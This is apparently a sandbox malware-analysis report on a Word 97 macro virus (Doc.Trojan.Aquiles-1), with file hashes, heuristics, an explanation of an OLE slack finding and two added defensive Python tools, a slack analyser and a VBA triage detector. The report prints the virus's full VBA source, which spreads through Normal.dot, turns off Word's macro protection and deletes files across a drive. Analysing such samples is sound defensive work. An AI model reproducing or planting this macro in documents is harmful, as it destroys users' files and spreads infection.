Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9961e1ad17be556…

MALICIOUS

Office (OLE)

Size: 37.5 KB (38,400 bytes)
Created: 2002-03-17 15:27:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a3455932d310351d0ab3ea16bba5ae42
SHA-1: a81a901fdceedbca1fb8ce333e86d0dbd0d68ac6
SHA-256: f9961e1ad17be5568fec48f4eeb78a01eea4f7bba4ff253afcff1dd0d9984ae3
Risk score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample as Doc.Trojan.Aquiles-1. Its single VBA module, named 'Aquiles', is a classic Word 97-era macro virus rather than a downloader. Document_Open first wipes every other VBA component in the active document and in the Normal template (removing any other macros present), then calls Document_Close, which hides the Visual Basic toolbar and the Tools > Macro entries, sets Options.VirusProtection = False to silence Word's macro warning, and copies the module line by line between the active document and Normal.dot, renaming it 'Aquiles' and saving, so that every document opened afterwards is infected in turn. Each infection of a document appends its path to C:\systemDos; once that log exceeds 1 KB the macro loops over it calling Kill on a wildcard and then deletes the log. The deletion passes an unassigned variable (s) instead of the path just read into direccion, so the effective pattern is \*.*, the root of the current drive, and On Error Resume Next hides any failure. Nothing in the code downloads or executes an external payload; the impact is self-replication, disabling of macro security, and file destruction. The p-code disassembly appended to the preview matches the decompressed source for the portion shown, so there is no sign of VBA stomping.

Heuristics 4

  • ClamAV: Doc.Trojan.Aquiles-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Aquiles-1
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    The OLE container is 38,400 bytes but its directory declares streams totalling only 19,534 bytes, leaving 18,866 bytes (49%) that no stream accounts for. This arithmetic also counts the header, FAT and directory sectors as unaccounted, so the true unallocated-sector slack is somewhat smaller. Unallocated sectors are a well-known hiding place for the XOR-encoded shellcode of Office exploit documents (reached through a parser memory-corruption bug rather than through macros), which is why the heuristic fires. For this sample the finding should be read with care: it is a Word 97 macro virus, Word's fast-save and editing behaviour routinely leaves stale sectors behind in documents of this era, and the only artifact carved from the file is the VBA module, so the slack is not by itself evidence of an embedded exploit. Confirming either way means dumping the free sectors and checking whether they hold recognisable document fragments or high-entropy, XOR-patterned data.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open is an auto-execute event handler: Word runs it as soon as the document is opened with macros enabled, so no further user interaction is needed. The same module also defines Document_Close, which carries the infection and destruction logic and is called directly from Document_Open.
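To make the OLE_SLACK_ANOMALY arithmetic reproducible, here is an added example (my own code, not part of this report or of oletools) that parses the OLE2/CFB header, FAT and directory directly, sums the declared stream sizes the way the heuristic does, and then lists which sectors the FAT actually marks as free and which of those contain non-zero bytes. It does not read the sample; it builds its own constructed fixture (a one-stream container with two free sectors, one of them carrying data), so the stream name WordDocument and every size in the fixture are assumptions. It handles version-3 files whose FAT is addressed entirely from the header DIFAT, which covers documents of this size.

```python
import struct

# Added example (not part of the report or of oletools): a minimal OLE2/CFB
# walker that reproduces the OLE_SLACK_ANOMALY arithmetic and then sharpens
# it by asking the FAT which sectors are actually unallocated.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT, NOSTREAM = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF


def ole_slack_report(data: bytes) -> dict:
    """Sum declared stream sizes and list unallocated sectors of a CFB file.
    Covers version-3 files whose FAT fits the 109 header DIFAT slots (~7 MB)."""
    if data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE2/CFB container")
    major, _byte_order, sector_shift = struct.unpack_from("<HHH", data, 0x1A)
    ssz = 1 << sector_shift
    num_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)

    def sector(n: int) -> bytes:                 # sector n starts after the header
        return data[(n + 1) * ssz:(n + 2) * ssz]

    fat = []
    for fat_sec in difat[:num_fat]:
        fat.extend(struct.unpack("<%dI" % (ssz // 4), sector(fat_sec)))

    streams, sec, seen = {}, first_dir, set()
    while sec != ENDOFCHAIN and sec not in seen:  # walk the directory chain
        seen.add(sec)
        block = sector(sec)
        for off in range(0, ssz, 128):
            entry = block[off:off + 128]
            name_len, obj_type = struct.unpack_from("<HB", entry, 0x40)
            if obj_type != 2:                     # 2 = stream object
                continue
            name = entry[:max(name_len - 2, 0)].decode("utf-16-le", "replace")
            size, = struct.unpack_from("<Q", entry, 0x78)
            if major == 3:                        # v3: only the low dword is meaningful
                size &= 0xFFFFFFFF
            streams[name] = size
        sec = fat[sec] if sec < len(fat) else ENDOFCHAIN

    total_sectors = -(-(len(data) - ssz) // ssz)  # ceil; tolerate a short last sector
    unallocated = [n for n in range(total_sectors) if n < len(fat) and fat[n] == FREESECT]
    nonzero = [n for n in unallocated if any(sector(n))]
    declared = sum(streams.values())
    return {
        "file_size": len(data),
        "streams": streams,
        "declared_stream_bytes": declared,
        "unaccounted_bytes": len(data) - declared,   # the report's arithmetic
        "unaccounted_pct": round(100.0 * (len(data) - declared) / len(data), 1),
        "unallocated_sectors": unallocated,           # FAT says: free
        "nonzero_unallocated_sectors": nonzero,       # free, yet holding data
    }


def build_sample_ole() -> bytes:
    """Constructed fixture: header, FAT, directory, one 4096-byte 'WordDocument'
    stream in sectors 2-9, then two sectors the FAT marks FREE, one of which
    carries bytes that no stream-level parser would ever surface."""
    ssz = 512
    fat = [FREESECT] * (ssz // 4)
    fat[0], fat[1] = FATSECT, ENDOFCHAIN           # sector 0 = FAT, sector 1 = directory
    for n in range(2, 9):                           # stream chain 2 -> 3 -> ... -> 9
        fat[n] = n + 1
    fat[9] = ENDOFCHAIN

    def dir_entry(name, obj_type, child, start, size):
        raw = name.encode("utf-16-le") + b"\x00\x00"
        e = bytearray(128)
        e[:len(raw)] = raw
        struct.pack_into("<HBB", e, 0x40, len(raw) if name else 0, obj_type, 1)
        struct.pack_into("<III", e, 0x44, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 0x74, start, size)
        return bytes(e)

    directory = (dir_entry("Root Entry", 5, 1, ENDOFCHAIN, 0)
                 + dir_entry("WordDocument", 2, NOSTREAM, 2, 4096)
                 + dir_entry("", 0, NOSTREAM, 0, 0) * 2)

    header = bytearray(ssz)
    header[:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", header, 0x18, 0x3E, 3, 0xFFFE, 9, 6)   # v3, 512-byte sectors
    struct.pack_into("<9I", header, 0x28, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", header, 0x4C, 0, *([FREESECT] * 108))   # DIFAT: FAT is sector 0

    sectors = [struct.pack("<128I", *fat), directory]
    sectors += [b"A" * ssz] * 8                                        # stream body
    sectors.append(b"<hidden bytes in a FREE sector>".ljust(ssz, b"\x00"))  # constructed slack
    sectors.append(b"\x00" * ssz)                                      # free and genuinely empty
    return bytes(header) + b"".join(sectors)


if __name__ == "__main__":
    for key, value in ole_slack_report(build_sample_ole()).items():
        print(f"{key}: {value}")
```

The FAT-based list is the sharper signal: header, FAT and directory sectors are never stream bytes, so subtracting declared stream sizes from the file size (the report's 49%) overstates the slack, while a free sector that is not all zeros is exactly the region worth dumping. On a real file, call ole_slack_report(open(path, "rb").read()).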

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  9355 bytes
SHA-256: d73b29cc1b5159dbc1f897d68463e888eb46fd0f82bf225962fb372109371a1f
Detection
ClamAV: Doc.Trojan.Aquiles-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Aquiles"
Attribute VB_Base = "1Normal.Aquiles"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
 On Error Resume Next
 If ActiveDocument.VBProject.VBComponents.Count > 1 Then
 For op = 2 To ActiveDocument.VBProject.VBComponents.Count
   cantidad = ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
   ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
 Next op
 End If
 If NormalTemplate.VBProject.VBComponents.Count > 1 Then
 For op = 2 To NormalTemplate.VBProject.VBComponents.Count
   cantidad = NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
   NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
 Next op
 End If
 Document_Close
End Sub
Private Sub Document_Close()
 On Error Resume Next
 CommandBars("Visual Basic").Visible = False
 Options.VirusProtection = False
 CommandBars("Tools").Controls("Macro").Enabled = False
 CommandBars("View").Controls(6).Enabled = False
 CommandBars("tools").Controls(15).Enabled = False
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 If MacroContainer.FullName = ActiveDocument.FullName Then
  If nt.Name <> "Aquiles" Then GoTo ClaudioNormal
 Else
  If ad.Name <> "Aquiles" Then GoTo Aquilesdocument
 End If
GoTo Findelmundo
Aquilesdocument:
 lineas = ad.CodeModule.CountOfLines
 ad.CodeModule.DeleteLines 1, lineas
 lineas = 1
 Do While lineas <= nt.CodeModule.CountOfLines
    cadenadecodigo = nt.CodeModule.lines(lineas, 1)
    ad.CodeModule.insertlines lineas, cadenadecodigo
    lineas = lineas + 1
 Loop
 ad.Name = "Aquiles"
 Open "C:\systemDos" For Append As #1
   Print #1, ActiveDocument.Path
 Close #1
 ActiveDocument.Save
GoTo Findelmundo
ClaudioNormal:
 lineas = nt.CodeModule.CountOfLines
 nt.CodeModule.DeleteLines 1, lineas
 lineas = 1
 Do While lineas <= ad.CodeModule.CountOfLines
    cadenadecodigo = ad.CodeModule.lines(lineas, 1)
    nt.CodeModule.insertlines lineas, cadenadecodigo
    lineas = lineas + 1
 Loop
 nt.Name = "Aquiles"
 NormalTemplate.Save
Findelmundo:
If Dir("C:\systemDos", vbNormal) <> "" Then
If FileLen("C:\systemDos") > 1024 Then
  Open "C:\systemDos" For Input As #1
    Line Input #1, direccion
    Do While Not EOF(1)
      Kill (s + "\*.*")
      Line Input #1, direccion
    Loop
  Close #1
  Kill ("C:\systemDos")
End If
End If
'Al rio jactancioso, Dios le a puesto un vado. Malinke   [English: To the boastful river, God has put a ford. Malinke]
'Y una vez mas el emperador interpuso su alma, claudIo   [English: And once again the emperor interposed his soul, claudIo]
'esto es una modificacion, trato de llegar a la perfeccion   [English: this is a modification, I am trying to reach perfection]
End Sub

' Processing file: /opt/analyzer/scan_staging/c606dbd6d33b46ebb5e3498c62ee3f01.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Aquiles - 4581 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Gt 
' 	IfBlock 
' Line #3:
' 	StartForVariable 
' 	Ld op 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #4:
' 	Ld op 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St cantidad 
' Line #5:
' 	LitDI2 0x0001 
' 	Ld cantidad 
' 	Ld op 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #6:
' 	StartForVariable 
' 	Ld op 
' 	EndForVariable 
' 	NextVar 
' Line #7:
' 	EndIfBlock 
' Line #8:
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Gt 
' 	IfBlock 
' Line #9:
' 	StartForVariable 
' 	Ld op 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	
... (truncated)
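The macro in the preview above shows the traits an olevba-style keyword analysis keys on: auto-execute handlers, writes to the VBA project through CodeModule, the Options.VirusProtection switch, NormalTemplate.Save and Kill. As an added example (my own code, not part of this report or of oletools), here is a small triage pass over decoded VBA source that reports those traits with line numbers and turns the combination auto-exec + self-modification + template persistence into a macro-virus verdict. The rule tables are my own choices; the sample input is an excerpt of the Aquiles module shown above plus a constructed benign macro.

```python
import re

# Added example (not part of the report or of oletools): keyword triage of
# decoded VBA source keyed on the traits of self-replicating Word macro
# viruses. Rule tables are my own; olevba ships a broader set.
AUTO_EXEC = ("Document_Open", "Document_Close", "Document_New",
             "AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit")
AUTOEXEC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(%s)\b" % "|".join(AUTO_EXEC),
                         re.IGNORECASE | re.MULTILINE)
# VBA is case-insensitive (the sample writes both insertlines and InsertLines),
# so every rule below is applied with re.IGNORECASE.
RULES = {
    "security_tampering": [r"Options\.VirusProtection\s*=\s*False",
                           r"CommandBars\(.+\)\..*(Visible|Enabled)\s*=\s*False"],
    "vba_self_modification": [r"VBProject\.VBComponents",
                              r"CodeModule\.(InsertLines|DeleteLines|AddFromString)"],
    "template_persistence": [r"NormalTemplate\.Save"],
    "drops_file": [r"\bOpen\s+.+\s+For\s+(Append|Output|Binary)\b"],
    "file_destruction": [r"\bKill\b", r"\bRmDir\b"],
}


def triage_vba(source: str) -> dict:
    """Return auto-exec triggers, rule hits (1-based line numbers) and a verdict."""
    hits = {cat: [] for cat in RULES}
    for lineno, line in enumerate(source.splitlines(), 1):
        for cat, patterns in RULES.items():
            if any(re.search(p, line, re.IGNORECASE) for p in patterns):
                hits[cat].append(lineno)
    triggers = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(source)}, key=str.lower)
    # The virus signature: runs on its own, rewrites VBA code, and saves Normal.dot.
    replicates = bool(triggers) and bool(hits["vba_self_modification"]) \
        and bool(hits["template_persistence"])
    if replicates:
        verdict = "self-replicating macro virus"
    elif triggers and any(hits.values()):
        verdict = "suspicious auto-exec macro"
    else:
        verdict = "low"
    return {"triggers": triggers, "hits": hits, "verdict": verdict}


# Excerpt of the decoded Aquiles module from the preview above, trimmed to
# the lines that carry the behaviour (line numbers below refer to this excerpt).
SAMPLE = r'''Private Sub Document_Open()
 On Error Resume Next
 ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
 Document_Close
End Sub
Private Sub Document_Close()
 On Error Resume Next
 Options.VirusProtection = False
 CommandBars("Tools").Controls("Macro").Enabled = False
 ad.CodeModule.insertlines lineas, cadenadecodigo
 Open "C:\systemDos" For Append As #1
 NormalTemplate.Save
 Kill (s + "\*.*")
End Sub
'''

# Constructed benign macro: auto-exec handler, but nothing else of interest.
BENIGN = '''Private Sub Document_Open()
 MsgBox "Welcome"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("aquiles excerpt", SAMPLE), ("benign", BENIGN)):
        print(label, triage_vba(src))
```

Auto-exec alone is not a finding (many legitimate templates hook Document_Open); it is the pairing with VBProject access and NormalTemplate.Save that separates a virus from a form macro, which is why the verdict requires all three.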